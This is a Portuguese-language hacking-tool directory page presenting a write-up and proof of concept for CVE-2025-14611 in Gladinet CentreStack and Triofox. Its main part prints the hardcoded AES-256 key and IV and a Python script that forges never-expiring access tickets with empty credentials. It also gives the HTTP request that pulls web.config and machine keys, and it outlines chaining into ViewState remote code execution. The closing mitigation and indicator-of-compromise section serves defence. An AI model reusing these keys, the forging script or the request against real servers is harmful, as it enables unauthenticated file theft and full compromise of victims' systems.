Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-14611-CentreStack-and-Triofox-full-Poc-Exploit — CVE-2025-14611 CentreStack e Triofox PoC/Exploit completo | Kitploit
Ferramentas/GitHubGitHub/pl4tyz/cve-2025-14611-centrestack-and-triofox-full-poc-exploit
Análise de VulnerabilidadesExploraçãoEngenharia ReversaExploração de Aplicações WebCriptografiaTestes de PenetraçãoAutenticaçãoRed TeamingDesenvolvimento de Payloads
GitHubpl4tyz/cve-2025-14611-centrestack-and-triofox-full-poc-exploit

CVE-2025-14611-CentreStack-and-Triofox-full-Poc-Exploit

CVE-2025-14611 CentreStack e Triofox PoC/Exploit completo

Ver Repositório
2há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-14611 CentreStack e Triofox Poc/Exploit completo

Resumo

Esta vulnerabilidade decorre de chaves criptográficas codificadas nos produtos Gladinet CentreStack e Triofox, permitindo leitura arbitrária de arquivos por meio de tickets de acesso forjados. A implementação de criptografia AES-256 usa chaves estáticas e imutáveis embutidas diretamente no binário do aplicativo (GladCtrl64.dll), permitindo que qualquer atacante que extraia essas chaves possa:

  1. Descriptografar tickets de acesso legítimos para entender caminhos de arquivos internos e configuração do sistema
  2. Forjar tickets de acesso maliciosos com carimbos de data/hora que nunca expiram para ler arquivos arbitrários no servidor
  3. Contornar a autenticação deixando os campos de nome de usuário e senha vazios, fazendo o aplicativo recorrer à identidade do pool de aplicativos do IIS
  4. Encadear esta vulnerabilidade com CVE-2025-30406 (desserialização de ViewState) para obter execução remota de código

A vulnerabilidade afeta todas as versões do Gladinet CentreStack e Triofox anteriores à 16.12.10420.56791 e tem sido explorada ativamente desde pelo menos novembro de 2025.

Análise

1. Geração e Armazenamento de Chaves

A vulnerabilidade começa com a forma como as chaves criptográficas são geradas e armazenadas em GladCtrl64.dll. As funções GenerateSecKey e são responsáveis por fornecer a chave de criptografia AES e o vetor de inicialização (IV).

GenerateSecKey1

Fluxo de Geração de Chaves:

Quando o aplicativo de servidor CentreStack inicia, a classe SysKeyMgr chama AccessKeyMgr64.GetSysEncKey, que invoca GenerateSecKey localizada em GladCtrl64.dll. Esta função:

root@kitploit:~
PSTR sub_180001000(wchar16* arg1)
{
    int32_t cbMultiByte = WideCharToMultiByte(CodePage: 0xfde9, dwFlags: 0, 
        lpWideCharStr: arg1, cchWideChar: 0xffffffff, lpMultiByteStr: nullptr, 
        cbMultiByte: 0, lpDefaultChar: nullptr, lpUsedDefaultChar: nullptr);
    
    if (cbMultiByte != 0) {
        PSTR lpMultiByteStr = sub_1800012e0(sx.q(cbMultiByte + 2));
        
        if (lpMultiByteStr != 0) {
            if (WideCharToMultiByte(CodePage: 0xfde9, dwFlags: 0, lpWideCharStr: arg1, 
                    cchWideChar: 0xffffffff, lpMultiByteStr, cbMultiByte, 
                    lpDefaultChar: nullptr, lpUsedDefaultChar: nullptr) != 0)
                return lpMultiByteStr;
            
            sub_180001290(lpMultiByteStr);
        }
    }
    return nullptr;
}

A função converte strings codificadas em UTF-16LE para UTF-8 usando a API do Windows WideCharToMultiByte com a página de código 0xfde9 (UTF-8). Os dados de origem são armazenados em dois locais de memória estáticos:

  • Fonte da Chave (0x18000c000): Uma string UTF-16LE de 100 bytes contendo texto chinês
  • Fonte do IV (0x18000c2c0): Uma string UTF-16LE de 100 bytes começando com "moDriv" seguida de texto japonês

Descoberta Crítica: Essas strings nunca mudam em nenhuma instalação do software. O nome da função GenerateSecKey é enganoso — ela não gera chaves dinamicamente, mas simplesmente retorna strings estáticas pré-existentes do binário.

2. As Chaves Codificadas

Por meio de análise de engenharia reversa, as chaves codificadas foram extraídas da seção .data de GladCtrl64.dll:

Memória em 0x18000c000 (Fonte da Chave):

root@kitploit:~
0d 4e c7 8f 0c ff 03 8c e5 67 5f 4e 3e 66 3a 79
0c ff e5 65 2c 67 01 30 a6 7e e6 65 01 30 e5 4e
72 82 17 52 8c 54 ce 9e f4 5d e9 5a 49 7b fd 56
84 76 d7 53 03 8c e5 67 05 80 27 59 1a 59 a4 8b
...

Quando decodificada de UTF-16LE para UTF-8, isto produz texto chinês:

root@kitploit:~
不过,调查也显示,日本、约旦、以色列和黎巴嫩等国的受调查者大多认为美国仍将保持自己的超级大国地位...

Memória em 0x18000c2c0 (Fonte do IV):

root@kitploit:~
6d 6f 44 72 69 76 65 00   // "moDriv" in ASCII/UTF-16LE
65 00 6f 30 01 30 c9 30 e9 30 a4 30 d6 30 68 30
57 30 66 30 de 30 a6 30 f3 30 c8 30 67 30 4d 30
...

Quando decodificada, isto produz:

root@kitploit:~
moDriveは、ドライブとしてマウントできるので、フォルダコピー感覚で使えて超快適だが...

Chaves Criptográficas Finais:

O aplicativo usa os primeiros 32 bytes da Fonte da Chave codificada em UTF-8 como chave AES-256, e os primeiros 16 bytes da Fonte do IV codificada em UTF-8 como vetor de inicialização:

root@kitploit:~
AES-256 Key: e4b88de8bf87efbc8ce8b083e69fa5e4b99fe698bee7a4baefbc8ce697a5e69c
AES IV:      6d6f4472697665e381afe38081e38389

3. O Manipulador de Download de Arquivo Vulnerável

A vulnerabilidade é explorada por meio do manipulador HTTP filesvr.dn, que é mapeado para a classe GladinetStorage.FileDownloadHandler. Este manipulador processa tickets de acesso criptografados passados via parâmetro de consulta t.

Estrutura do Ticket de Acesso:

Os tickets de acesso são campos separados por quebras de linha criptografados com AES-256-CBC:

root@kitploit:~
Linha 0: Caminho do arquivo (caminho absoluto no servidor)
Linha 1: Nome de usuário (conta do Windows a ser representada)
Linha 2: Senha (credenciais para essa conta)
Linha 3: Carimbo de data/hora (hora de criação do ticket)

O Processo de Descriptografia:

  1. O manipulador recebe o parâmetro t e executa uma sanitização personalizada, trocando caracteres seguros para URL (: → +, | → /)
  2. O valor é decodificado em Base64 para obter o texto cifrado
  3. AccessTicket.Decrypt é chamado, que recupera o SysKey estático (primeiros 32 bytes) e o SysKey1 (primeiros 16 bytes)
  4. Uma cifra AES-256-CBC é configurada com essas chaves
  5. O ticket é descriptografado e analisado

Contorno da Validação de Carimbo de Data/Hora:

O manipulador compara o carimbo de data/hora do ticket com a hora atual do servidor. Se o ticket for mais antigo que 4 horas, ele é rejeitado. No entanto, os atacantes podem definir o carimbo de data/hora para o ano 9999, criando um ticket que nunca expira:

root@kitploit:~
9999-11-27 14:52:04.009217

Isso cria uma backdoor persistente que pode ser reutilizada indefinidamente.

4. Contorno de Autenticação por Credenciais Vazias

Após a descriptografia, o manipulador extrai os campos Nome de usuário e Senha e tenta inicializar um contexto de impersonação. Vulnerabilidade crítica: Quando ambos os campos são strings vazias, a lógica de impersonação falha e recorre à identidade do pool de aplicativos do IIS.

Isso permite leitura arbitrária de arquivos sem autenticação, pois o aplicativo é executado com privilégios elevados, mas não exige credenciais válidas.

Exemplo de Ticket Malicioso:

root@kitploit:~
C:\Program Files (x86)\Gladinet Cloud Enterprise\root\web.config
[empty]
[empty]
9999-11-27 14:52:04.009217

5. Exploração no Mundo Real

Exploração ativa tem sido observada desde novembro de 2025. Os atacantes seguem este padrão:

Passo 1: Forjar Ticket de Acesso

Usando as chaves extraídas, os atacantes criam tickets criptografados direcionados a web.config:

root@kitploit:~
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
import base64

AES_KEY = bytes.fromhex('e4b88de8bf87efbc8ce8b083e69fa5e4b99fe698bee7a4baefbc8ce697a5e69c')
AES_IV = bytes.fromhex('6d6f4472697665e381afe38081e38389')

ticket = "C:\\Program Files (x86)\\Gladinet Cloud Enterprise\\root\\web.config\n\n\n9999-11-27 14:52:04.009217"
cipher = AES.new(AES_KEY, AES.MODE_CBC, AES_IV)
ciphertext = cipher.encrypt(pad(ticket.encode('utf-8'), 16))
b64 = base64.b64encode(ciphertext).decode('ascii')
url_safe = b64.replace('+', ':').replace('/', '|')

Passo 2: Enviar Requisição Maliciosa

O ticket forjado é enviado ao endpoint vulnerável:

root@kitploit:~
GET /storage/filesvr.dn?t=vghpI7EToZUDIZDdprSubL3mTZ2... HTTP/1.1
Host: vulnerable-server.com

Passo 3: Extrair Chaves de Máquina

A resposta contém o arquivo web.config com as chaves de máquina:

root@kitploit:~
<machineKey 
    validationKey="ABC123..." 
    decryptionKey="DEF456..." 
    validation="SHA1" 
    decryption="AES" 
/>

Passo 4: Encadear com CVE-2025-30406

Essas chaves de máquina permitem ataques de desserialização de ViewState, levando à execução remota de código. Os atacantes criam payloads maliciosos de ViewState assinados com as chaves extraídas, obtendo comprometimento total do sistema.

6. Exemplo de Ataque no Mundo Real

De tentativas de exploração observadas (dezembro de 2025):

Ticket Criptografado do Atacante:

root@kitploit:~
vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsumkDyUgpV5VLxL|372varAu

Conteúdo Descriptografado:

root@kitploit:~
C:\Program Files (x86)\Gladinet Cloud Enterprise\root\web.config
[empty]
[empty]
9999-11-27 14:52:04.009217

Fonte do Ataque: Endereço IP 147.124.216[.]205
Organizações-Alvo: 9 vítimas confirmadas nos setores de saúde, tecnologia e serviços profissionais
Linha do Tempo do Ataque: Tentativas iniciais de exploração em novembro de 2025, com escalada em dezembro de 2025

Conclusão

CVE-2025-14611 representa uma falha crítica no gerenciamento de chaves criptográficas. Ao embutir chaves estáticas e imutáveis diretamente no binário do aplicativo, a Gladinet criou uma chave-mestra universal que funciona em todas as instalações. Esta vulnerabilidade demonstra várias falhas graves de segurança:

  1. Criptografia Codificada: Usar chaves estáticas elimina qualquer benefício de segurança da criptografia
  2. Contorno de Autenticação: A manipulação de credenciais vazias permite acesso não autenticado
  3. Tickets que Nunca Expiram: Carimbos de data/hora no futuro distante criam backdoors persistentes
  4. Encadeamento de Exploits: Combinado com CVE-2025-30406, isso permite o comprometimento total do sistema

Recomendações de Mitigação:

  • Imediato: Atualizar para a versão 16.12.10420.56791 ou posterior do CentreStack/Triofox
  • Crítico: Rotacionar as chaves de máquina em web.config após aplicar a correção
  • Defesa: Monitorar os logs do IIS para acessos a /storage/filesvr.dn com parâmetros t suspeitos
  • Detecção: Procurar nos logs o indicador: vghpI7EToZUDIZDdprSubL3mTZ2 (representação criptografada do caminho do web.config)
  • Rede: Bloquear acesso de entrada ao CentreStack a partir de redes não confiáveis

Indicador de Comprometimento:

Qualquer requisição HTTP que contenha:

root@kitploit:~
/storage/filesvr.dn?t=vghpI7EToZUDIZDdprSubL3mTZ2

Esta substring identifica exclusivamente tentativas de explorar esta vulnerabilidade para recuperação do web.config.

Baixar ferramenta